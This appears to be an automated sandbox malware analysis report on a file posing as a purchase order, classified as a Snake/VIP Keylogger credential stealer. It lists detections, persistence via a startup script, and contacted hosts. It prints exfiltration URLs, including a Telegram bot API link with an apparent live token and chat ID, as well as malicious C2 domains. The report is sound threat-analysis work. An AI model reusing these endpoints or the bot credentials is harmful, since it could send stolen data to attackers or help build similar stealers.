                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1513787 Sample: New Order PO#86637.exe Startdate: 19/09/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 4 other IPs or domains 2->34 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 52 12 other signatures 2->52 8 New Order PO#86637.exe 3 2->8         started        11 wscript.exe 1 2->11         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\name.exe, PE32 8->26 dropped 14 name.exe 1 8->14         started        58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->58 18 name.exe 11->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\Roaming\...\name.vbs, data 14->28 dropped 60 Antivirus detection for dropped file 14->60 62 Multi AV Scanner detection for dropped file 14->62 64 Machine Learning detection for dropped file 14->64 70 2 other signatures 14->70 20 RegSvcs.exe 15 2 14->20         started        66 Writes to foreign memory regions 18->66 68 Maps a DLL or memory area into another process 18->68 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49724, 49744 TELEGRAMRU United Kingdom 20->36 38 us2.smtp.mailhostbox.com 208.91.199.223, 49745, 587, 61514 PUBLIC-DOMAIN-REGISTRYUS United States 20->38 40 3 other IPs or domains 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      New Order PO#86637.exe42%ReversingLabs
                      New Order PO#86637.exe100%AviraHEUR/AGEN.1321293
                      New Order PO#86637.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\directory\name.exe100%AviraHEUR/AGEN.1321293
                      C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\directory\name.exe47%ReversingLabsWin32.Trojan.SnakeStealer
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      http://checkip.dyndns.org0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      http://varders.kozow.com:80810%URL Reputationsafe
                      http://aborters.duckdns.org:8081100%URL Reputationmalware
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      http://checkip.dyndns.org/0%URL Reputationsafe
                      http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                      https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                      http://anotherarmy.dns.army:8081100%URL Reputationmalware
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      http://checkip.dyndns.org/q0%URL Reputationsafe
                      https://reallyfreegeoip.org0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                      https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                      https://api.telegram.org0%Avira URL Cloudsafe
                      https://api.telegram.org/bot0%Avira URL Cloudsafe
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                      https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                      https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery0%Avira URL Cloudsafe
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                      https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=40390%Avira URL Cloudsafe
                      http://us2.smtp.mailhostbox.com0%Avira URL Cloudsafe
                      https://www.office.com/0%Avira URL Cloudsafe
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a0%Avira URL Cloudsafe
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2018:25:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                      https://api.telegram0%Avira URL Cloudsafe
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2021:04:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                      http://api.telegram.org0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      208.91.199.223
                      truetrue
                        unknown
                        reallyfreegeoip.org
                        188.114.97.3
                        truetrue
                          unknown
                          api.telegram.org
                          149.154.167.220
                          truetrue
                            unknown
                            checkip.dyndns.com
                            132.226.247.73
                            truefalse
                              unknown
                              checkip.dyndns.org
                              unknown
                              unknowntrue
                                unknown
                                206.23.85.13.in-addr.arpa
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://reallyfreegeoip.org/xml/8.46.123.33false
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.org/false
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2018:25:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2021:04:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.orgRegSvcs.exe, 00000003.00000002.4537810663.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/botRegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://us2.smtp.mailhostbox.comRegSvcs.exe, 00000003.00000002.4537810663.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://varders.kozow.com:8081name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4534989521.0000000000433000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://aborters.duckdns.org:8081name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4534989521.0000000000433000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  unknown
                                  https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=4039RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://reallyfreegeoip.org/xml/8.46.123.33$RegSvcs.exe, 00000003.00000002.4537810663.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.000000000278B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://anotherarmy.dns.army:8081name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4534989521.0000000000433000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.org/qname.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegramRegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://api.telegram.orgRegSvcs.exe, 00000003.00000002.4537810663.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedname.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://reallyfreegeoip.org/xml/name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  208.91.198.143
                                  unknownUnited States
                                  394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                  149.154.167.220
                                  api.telegram.orgUnited Kingdom
                                  62041TELEGRAMRUtrue
                                  188.114.97.3
                                  reallyfreegeoip.orgEuropean Union
                                  13335CLOUDFLARENETUStrue
                                  208.91.199.223
                                  us2.smtp.mailhostbox.comUnited States
                                  394695PUBLIC-DOMAIN-REGISTRYUStrue
                                  132.226.247.73
                                  checkip.dyndns.comUnited States
                                  16989UTMEMUSfalse
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1513787
                                  Start date and time:2024-09-19 12:20:08 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 41s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:9
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:New Order PO#86637.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winEXE@10/3@8/5
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 50
                                  • Number of non-executed functions: 312
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • VT rate limit hit for: New Order PO#86637.exe
                                  TimeTypeDescription
                                  06:21:08API Interceptor16970339x Sleep call for process: RegSvcs.exe modified
                                  12:21:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  208.91.198.143z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    z68ORDER.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      z17invoice.exeGet hashmaliciousAgentTeslaBrowse
                                        z47maaaaaaaaaaaaax.exeGet hashmaliciousAgentTeslaBrowse
                                          SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                giehjhgjzJ.htaGet hashmaliciousCobalt Strike, MassLogger RAT, Snake KeyloggerBrowse
                                                  NGL1Of0ZkJ.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                                    SecuriteInfo.com.Win32.PWSX-gen.19673.26192.exeGet hashmaliciousAgentTeslaBrowse
                                                      149.154.167.2202.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        Order_List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          Zahlungsbest#U00e4tigung.exeGet hashmaliciousAgentTeslaBrowse
                                                            z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              rNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                Order #SS1953pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                  SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      Quotation 47923.exeGet hashmaliciousSnake Keylogger, VIP Keylogger, XRedBrowse
                                                                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          188.114.97.3PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                          • www.chinaen.org/mquw/
                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                          • filetransfer.io/data-package/TX2daF45/download
                                                                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                          • filetransfer.io/data-package/mCJwtLTf/download
                                                                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                          • filetransfer.io/data-package/KiyXDELa/download
                                                                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                          • filetransfer.io/data-package/mCJwtLTf/download
                                                                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • filetransfer.io/data-package/G1NY5FRK/download
                                                                          SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                          • vlha.shop/LP341/index.php
                                                                          Petronas request for-quotation.exeGet hashmaliciousFormBookBrowse
                                                                          • www.1win-moldovia.fun/1g7m/
                                                                          SecuriteInfo.com.Trojan.Siggen29.8143.15092.30622.exeGet hashmaliciousXmrigBrowse
                                                                          • down.mvip8.ru/7z.dll
                                                                          3XRUFJRb3K.dllGet hashmaliciousUnknownBrowse
                                                                          • web.ad87h92j.com/4/t.bmp
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          reallyfreegeoip.org2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          Order_List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          ESD99W89W99-PO9W2788Q-SHK092782.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          PO#180924.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          rNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          MT LADY YASSO VESSEL BRIEF DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          IMG_1507_1603.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          MT103 SWIFT COPY.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          checkip.dyndns.com2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 132.226.8.169
                                                                          Order_List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 132.226.8.169
                                                                          ESD99W89W99-PO9W2788Q-SHK092782.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 193.122.130.0
                                                                          PO#180924.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 132.226.8.169
                                                                          z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 132.226.8.169
